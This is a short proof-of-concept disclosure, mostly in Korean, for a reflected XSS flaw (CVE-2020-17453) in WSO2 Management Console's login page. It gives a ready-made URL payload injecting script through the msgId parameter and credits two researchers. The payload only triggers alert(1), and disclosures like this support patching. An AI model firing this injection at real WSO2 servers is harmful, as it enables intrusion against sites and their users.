
PoC (Proof of Concept) - CVE-2020-17453
CVE-2020-17453
WSO2 Management Console 5.10 버전까지는 carbon/admin/login.jsp의 msgId 매개변수를 통해 XSS가 허용됩니다.

https://<company>.com/carbon/admin/login.jsp?msgId=%27;alert(1)//
이름: Jackson Henry
트위터: @JacksonHHax
이름: Nicholas Young